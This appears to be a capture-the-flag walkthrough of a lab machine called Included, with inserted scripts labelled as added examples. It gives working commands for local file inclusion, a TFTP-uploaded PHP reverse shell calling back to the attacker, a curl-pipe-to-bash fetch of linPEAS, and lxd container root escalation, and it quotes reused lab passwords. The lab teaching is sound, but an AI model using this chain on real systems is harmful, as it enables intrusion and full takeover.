Included Walkthrough
After the Pathfinder walkthrough, here I am with Included, so... let's hack and grab the flags.
As I mentioned before, the Starting Point machines are a series of 9 machines rated "very easy" that are meant to be rooted in sequence. So if you want to go through this box, you must have completed the Pathfinder machine first (credentials from it are reused here).
Enough talk, let's get it started.
Disclaimer: no flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags yourself!
00. Start Machine
To start the machine, just click on "Join Machine".
Then you can see the IP address of that machine.
Before moving on to enumeration we can simply ping the IP address to check that the VPN is connected and the machine is alive. Sometimes ICMP echo requests are dropped by a firewall in front of the machine, but in most cases the ping will succeed.
The ping reply comes back with TTL=63. Linux hosts send packets with an initial TTL of 64 (Windows uses 128), and there is one router hop between us and the machine (the VPN gateway) that decrements it by one, so a TTL of 63 tells us this is almost certainly a Linux machine.
01. Enumeration First
01.1 Fast ports scan
As usual, run an Nmap fast scan across all TCP ports to identify which ones are open.
nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.55
-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Full TCP port range (1-65535)
-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network
Here is the output:
So again we have only port 80 open. Keep in mind that this is a TCP-only scan; it says nothing about UDP services.
01.2 Run Nmap Scripting Engine
To get more detail, we can run the Nmap Scripting Engine (default scripts plus version detection) against the open ports. Since we already know which ports are open, we can point the scan at just those and it finishes much faster.
nmap -sV -sC -oN DetailPorts.nmap -p 80 10.10.10.55
We have only port 80 open here. Now you know what is next..
01.3 Discover more on port 80
Let's open a web browser and check what is served on port 80.
The URL itself hints at a directory traversal (local file inclusion) vulnerability: the page is loaded through a file parameter. So let's check it.
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files. In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to modify application data or behavior, and ultimately take full control of the server. (source)
We can easily check this using the Burp Suite Repeater tab. Let's fire up Burp Suite and navigate to the site again.
As you can see, we have a directory traversal vulnerability. If we can upload a reverse shell script, we can include that file through this vulnerability and get a shell. But how do we upload the reverse shell file? I tried hard to find a way but I could not.
Then I looked closely at all the users available in /etc/passwd, read through the directory traversal vulnerability. You know what I found there? There is also a tftp user. Wait, what... How did we miss that port? Oh shoot! It's running on UDP port 69.
Let's run Nmap again, this time as a UDP scan, and check whether that port is alive.
Yay!! It's alive. Let's try to connect to that service.
We can connect to that service and upload any file through it. Now we have an idea. But how do I know the exact path where the uploaded file is stored?
Again we can check the /etc/passwd file: the home directory of the tftp user tells us where the daemon keeps its files.
Fine! Now we know where my file will be located after I upload it via TFTP.
02. Foothold
First we need to create a PHP reverse shell. We can simply copy it from the Kali webshells directory (/usr/share/webshells/php/php-reverse-shell.php) or generate one using this site.
After editing the listener IP address and port, save the code to a file.
Now let's use TFTP to upload that file, with the put command.
Then fire up a netcat listener and request the uploaded file through the directory traversal vulnerability. The file will be located at /var/lib/tftpboot/filename.php
We successfully land a reverse shell as www-data; it's good to spawn a TTY shell.
python3 -c "import pty; pty.spawn('/bin/bash')"
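The foothold above, and the /etc/passwd lookup that told us where TFTP stores uploads, as one script. This is an added example, not the author's commands: it assumes the vulnerable query parameter is called "file" (the page does not name it), that the attacker's VPN address and listener port are 10.10.14.2:4444, that the tftp-hpa client is installed, and it uses a minimal PHP callback shell of its own rather than the Kali/pentestmonkey one. Nothing touches the network until run_foothold is called; the passwd parsing can be exercised offline on the constructed sample.

```shell
#!/bin/sh
# Added example for this walkthrough (not from the page). Assumptions are
# labelled: LFI parameter name, attacker address/port, tftp-hpa client.

TARGET="${TARGET:-10.10.10.55}"
LHOST="${LHOST:-10.10.14.2}"     # assumed attacker VPN address
LPORT="${LPORT:-4444}"           # assumed listener port (nc -lvnp 4444)
PARAM="${PARAM:-file}"           # assumed name of the vulnerable parameter

# Constructed /etc/passwd excerpt (example data, not the box's real file).
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
tftp:x:110:115:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin
mike:x:1000:1000:mike:/home/mike:/bin/bash'

# lfi_url PATH : the URL that includes PATH through the vulnerable parameter
lfi_url() {
    printf 'http://%s/?%s=%s\n' "$TARGET" "$PARAM" "$1"
}

# lfi_read PATH : fetch a server-side file through the LFI (network)
lfi_read() {
    curl -s "$(lfi_url "$1")"
}

# tftp_root : print the tftp user's home directory from passwd text on stdin,
# failing if there is no such user (that is the "where do uploads land" check)
tftp_root() {
    awk -F: '$1 == "tftp" { print $6; found = 1 } END { exit !found }'
}

# demo_tftp_root : the same lookup run offline on the constructed sample
demo_tftp_root() {
    printf '%s\n' "$PASSWD_SAMPLE" | tftp_root
}

# write_shell FILE : a minimal PHP reverse shell that connects back to LHOST:LPORT
write_shell() {
    cat > "$1" <<EOF
<?php
\$sock = fsockopen("$LHOST", $LPORT);
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
?>
EOF
}

# tftp_put FILE : upload FILE with the tftp-hpa client in binary (octet) mode (network)
tftp_put() {
    tftp -m binary "$TARGET" -c put "$1"
}

# run_foothold : the whole chain; start `nc -lvnp $LPORT` in another terminal first
run_foothold() {
    root="$(lfi_read /etc/passwd | tftp_root)" \
        || { echo "no tftp user in /etc/passwd" >&2; return 1; }
    write_shell shell.php
    tftp_put shell.php
    # Including the uploaded file executes it; curl blocks while the shell lives,
    # so background it and go to the listener.
    lfi_read "$root/shell.php" >/dev/null &
}
```

TFTP has no directory listing and no authentication, so the only way to know where `put` dropped the file is the daemon's configured root, which on this box is the tftp account's home directory; that is why the passwd lookup is the important step and why the script refuses to continue without it.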
If you look around the /home directory, there is a user called mike. Since all these boxes are connected together (I mean, passwords are reused), we can try the passwords we found in the Pathfinder walkthrough. Let's try su mike
Yes! It succeeds with the password Sheffield19 and we can grab the user flag. Now it's time for the root flag.
03. Privilege Escalation
When it comes to privilege escalation, we can check things manually one by one or simply run an automation script to do the searching for us. Since this is a Linux box we can use LinPEAS.
First we need to download the script to our attacking machine.
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
Then we can run Python's built-in HTTP server (module http.server, port 8000) to host that file from our end.
Now we could use wget to download that file onto the Included box. But here I'm not going to download it and run it; instead I use curl to pipe the script straight into a shell. Note that linpeas is a bash script, so pipe it into bash rather than plain sh (on Ubuntu sh is dash and the script will throw errors).
curl http://<YourIP>:8000/linpeas.sh | bash
We can identify interesting stuff by looking at the output.
As you can see, the mike user is in the lxd group. That group is effectively root-equivalent: its members can talk to the LXD daemon, which runs as root, and ask it to create a privileged container with the host's filesystem mounted inside.
Here I found the lxd/lxc group privilege escalation page on HackTricks, and I'm going to go through the second method in that article.
First, clone the following repository on your host and build an Alpine image.
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
After you execute build-alpine, a tar.gz file is created. The file name will differ from mine (it includes the Alpine version and build date).
Now we can serve it with the Python web server again and download it onto the box with wget.
Now follow the article again. The following commands import the image and create a privileged container from it.
lxc image import ./alpine*.tar.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=true
Next we need to mount the host's root filesystem (/) into the container at /mnt/root.
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Now Let's interact with the container.
lxc start mycontainer
lxc exec mycontainer /bin/sh
As you can see, we have a root shell inside the container, and because the container is privileged with the host's / mounted at /mnt/root, that is root on the host's files. Now we can grab root.txt; it's located at /mnt/root/root/
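The LXD steps above, wrapped in the checks a practitioner runs before each one. This is an added example, not the page's or HackTricks' code: it assumes the lxc client is on the box and that the Alpine tarball from lxd-alpine-builder has already been downloaded into the current directory. The group check parses `id` output, so it can be tested offline on constructed lines.

```shell
#!/bin/sh
# Added example for this walkthrough (not from the page or HackTricks).
# Assumes: lxc client present on the box, alpine*.tar.gz in the current directory.

# has_group NAME ID_OUTPUT : does the "groups=" list of an `id` line contain NAME?
# `id` prints e.g. "uid=1000(mike) gid=1000(mike) groups=1000(mike),116(lxd)".
has_group() {
    printf '%s\n' "$2" | sed -n 's/.*groups=//p' | tr ',' '\n' | grep -q "^[0-9]*($1)\$"
}

# image_tarball : print the first alpine tarball in the current directory, or fail
image_tarball() {
    for f in ./alpine*.tar.gz; do
        [ -f "$f" ] && { printf '%s\n' "$f"; return 0; }
    done
    echo "no alpine*.tar.gz found; build one with lxd-alpine-builder and upload it" >&2
    return 1
}

# lxd_privesc : the page's sequence with preconditions checked; ends in a root
# shell inside the container with the host's / at /mnt/root
lxd_privesc() {
    has_group lxd "$(id)" || { echo "current user is not in the lxd group" >&2; return 1; }
    command -v lxc >/dev/null 2>&1 || { echo "lxc client not found" >&2; return 1; }
    tarball="$(image_tarball)" || return 1

    lxc image import "$tarball" --alias myimage
    # If this fails with "No storage pool found", run `lxd init --auto` once and retry.
    lxc init myimage mycontainer -c security.privileged=true
    # recursive=true so filesystems mounted below / on the host (a separate /home,
    # for instance) are visible under /mnt/root as well.
    lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
    lxc start mycontainer
    lxc exec mycontainer -- /bin/sh
}
```

The escalation works because security.privileged=true maps the container's root to the host's uid 0; without that flag the disk device still appears at /mnt/root, but files owned by root on the host show up as nobody and root.txt stays unreadable.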
04. Post Exploitation
As you can see, there is a login.sql file in the /mnt/root/root directory. Let's open it.
And it reveals credentials. Daniel : >SNDv*2wzLWf
Okay... I'll see you on the next box, Markup!
Find me on @twitter